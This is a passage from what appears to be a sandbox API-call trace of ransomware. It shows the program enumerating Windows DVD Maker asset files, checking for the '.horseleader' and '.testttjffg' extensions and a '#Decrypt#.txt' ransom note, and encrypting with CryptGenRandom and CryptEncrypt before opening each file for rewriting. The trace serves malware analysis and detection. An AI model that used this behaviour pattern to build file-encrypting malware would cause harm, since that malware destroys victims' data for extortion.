(lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png", lpSrch=".testttjffg") returned 0x0 [0251.448] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.448] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\btn-previous-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.449] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a39de7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x75d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0251.449] lstrcmpiW (lpString1="button-highlight.png", lpString2="Windows") returned -1 [0251.449] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png") returned 77 [0251.449] StrStrIW (lpFirst="button-highlight.png", lpSrch=".horseleader") returned 0x0 [0251.449] lstrcmpW (lpString1="button-highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.449] lstrcmpW (lpString1="button-highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.449] lstrlenW (lpString=".testttjffg") returned 11 [0251.449] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.449] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.449] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\button-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.450] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729d59b7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729d59b7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4a39de7d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x55f, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="chapters-static.png", cAlternateFileName="")) returned 1 [0251.450] lstrcmpiW (lpString1="chapters-static.png", lpString2="Windows") returned -1 [0251.450] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png") returned 76 [0251.450] StrStrIW (lpFirst="chapters-static.png", lpSrch=".horseleader") returned 0x0 [0251.450] lstrcmpW (lpString1="chapters-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.450] lstrcmpW (lpString1="chapters-static.png", lpString2="_uninstalling_.png") returned 1 [0251.450] lstrlenW (lpString=".testttjffg") returned 11 [0251.450] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png", lpSrch=".testttjffg") returned 0x0 [0251.450] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.450] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.450] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\chapters-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\chapters-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.451] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x729fbb14, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x729fbb14, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4aba6851, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8df12, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="content-background.png", cAlternateFileName="")) returned 1 [0251.451] lstrcmpiW (lpString1="content-background.png", lpString2="Windows") returned -1 [0251.451] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png") returned 79 [0251.452] StrStrIW (lpFirst="content-background.png", lpSrch=".horseleader") returned 0x0 [0251.452] lstrcmpW (lpString1="content-background.png", lpString2="#Decrypt#.txt") returned 1 [0251.452] lstrcmpW (lpString1="content-background.png", lpString2="_uninstalling_.png") returned 1 [0251.452] lstrlenW (lpString=".testttjffg") returned 11 [0251.452] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png", lpSrch=".testttjffg") returned 0x0 [0251.452] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.452] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.452] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.452] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a47dce, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a47dce, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b362f69, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2f0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="content-foreground.png", cAlternateFileName="")) returned 1 [0251.452] lstrcmpiW (lpString1="content-foreground.png", lpString2="Windows") returned -1 [0251.452] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png") returned 79 [0251.453] StrStrIW (lpFirst="content-foreground.png", lpSrch=".horseleader") returned 0x0 [0251.453] lstrcmpW (lpString1="content-foreground.png", lpString2="#Decrypt#.txt") returned 1 [0251.453] lstrcmpW (lpString1="content-foreground.png", lpString2="_uninstalling_.png") returned 1 [0251.453] lstrlenW (lpString=".testttjffg") returned 11 [0251.453] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png", lpSrch=".testttjffg") returned 0x0 [0251.453] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.453] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.453] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\content-foreground.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\content-foreground.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.453] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a6df2b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a6df2b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b362f69, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb8c4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="curtains.png", cAlternateFileName="")) returned 1 [0251.453] lstrcmpiW (lpString1="curtains.png", lpString2="Windows") returned -1 [0251.453] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png") returned 69 [0251.453] StrStrIW (lpFirst="curtains.png", lpSrch=".horseleader") returned 0x0 [0251.454] lstrcmpW (lpString1="curtains.png", lpString2="#Decrypt#.txt") returned 1 [0251.454] lstrcmpW (lpString1="curtains.png", lpString2="_uninstalling_.png") returned 1 [0251.454] lstrlenW (lpString=".testttjffg") returned 11 [0251.454] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png", lpSrch=".testttjffg") returned 0x0 [0251.454] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.454] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.454] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\curtains.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\curtains.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.454] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b52759, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b52759, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b3fb4e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12d98, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_precomp_matte.wmv", cAlternateFileName="")) returned 1 [0251.454] lstrcmpiW (lpString1="flower_precomp_matte.wmv", lpString2="Windows") returned -1 [0251.454] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv") returned 81 [0251.455] StrStrIW (lpFirst="flower_precomp_matte.wmv", lpSrch=".horseleader") returned 0x0 [0251.455] lstrcmpW (lpString1="flower_precomp_matte.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.455] lstrcmpW (lpString1="flower_precomp_matte.wmv", lpString2="_uninstalling_.png") returned 1 [0251.455] lstrlenW (lpString=".testttjffg") returned 11 [0251.455] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv", lpSrch=".testttjffg") returned 0x0 [0251.455] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.455] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.455] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_precomp_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.458] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b52759, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b52759, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b3fb4e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x14cd8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_PreComp_MATTE_PAL.wmv", cAlternateFileName="")) returned 1 [0251.458] lstrcmpiW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="Windows") returned -1 [0251.459] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv") returned 85 [0251.459] StrStrIW (lpFirst="flower_PreComp_MATTE_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.459] lstrcmpW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.459] lstrcmpW (lpString1="flower_PreComp_MATTE_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.459] lstrlenW (lpString=".testttjffg") returned 11 [0251.459] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.459] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.459] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_PreComp_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_precomp_matte_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.459] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b788b6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b788b6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b42163f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x26618, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_trans_matte.wmv", cAlternateFileName="")) returned 1 [0251.460] lstrcmpiW (lpString1="flower_trans_matte.wmv", lpString2="Windows") returned -1 [0251.460] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv") returned 79 [0251.460] StrStrIW (lpFirst="flower_trans_matte.wmv", lpSrch=".horseleader") returned 0x0 [0251.460] lstrcmpW (lpString1="flower_trans_matte.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.460] lstrcmpW (lpString1="flower_trans_matte.wmv", lpString2="_uninstalling_.png") returned 1 [0251.460] lstrlenW (lpString=".testttjffg") returned 11 [0251.460] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv", lpSrch=".testttjffg") returned 0x0 [0251.460] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.460] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_matte.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.460] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b9ea13, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b9ea13, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b42163f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x28558, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_trans_MATTE_PAL.wmv", cAlternateFileName="")) returned 1 [0251.461] lstrcmpiW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="Windows") returned -1 [0251.461] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv") returned 83 [0251.461] StrStrIW (lpFirst="flower_trans_MATTE_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.461] lstrcmpW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.461] lstrcmpW (lpString1="flower_trans_MATTE_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.461] lstrlenW (lpString=".testttjffg") returned 11 [0251.461] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.461] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.461] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_MATTE_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_matte_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.461] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b0649f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b0649f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b44779d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e31e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_trans_rgb.wmv", cAlternateFileName="")) returned 1 [0251.461] lstrcmpiW (lpString1="flower_trans_rgb.wmv", lpString2="Windows") returned -1 [0251.461] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv") returned 77 [0251.461] StrStrIW (lpFirst="flower_trans_rgb.wmv", lpSrch=".horseleader") returned 0x0 [0251.462] lstrcmpW (lpString1="flower_trans_rgb.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.462] lstrcmpW (lpString1="flower_trans_rgb.wmv", lpString2="_uninstalling_.png") returned 1 [0251.462] lstrlenW (lpString=".testttjffg") returned 11 [0251.462] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv", lpSrch=".testttjffg") returned 0x0 [0251.462] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.462] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.462] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_rgb.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.463] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b2c5fc, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72b2c5fc, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5c4549, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39e98, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="flower_trans_RGB_PAL.wmv", cAlternateFileName="")) returned 1 [0251.463] lstrcmpiW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="Windows") returned -1 [0251.463] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv") returned 81 [0251.463] StrStrIW (lpFirst="flower_trans_RGB_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.463] lstrcmpW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.463] lstrcmpW (lpString1="flower_trans_RGB_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.463] lstrlenW (lpString=".testttjffg") returned 11 [0251.463] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.463] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.464] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\flower_trans_RGB_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\flower_trans_rgb_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.464] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a94088, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72a94088, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4b5c4549, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x609, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="highlight.png", cAlternateFileName="")) returned 1 [0251.464] lstrcmpiW (lpString1="highlight.png", lpString2="Windows") returned -1 [0251.464] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png") returned 70 [0251.464] StrStrIW (lpFirst="highlight.png", lpSrch=".horseleader") returned 0x0 [0251.464] lstrcmpW (lpString1="highlight.png", lpString2="#Decrypt#.txt") returned 1 [0251.464] lstrcmpW (lpString1="highlight.png", lpString2="_uninstalling_.png") returned 1 [0251.464] lstrlenW (lpString=".testttjffg") returned 11 [0251.464] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png", lpSrch=".testttjffg") returned 0x0 [0251.464] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.464] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 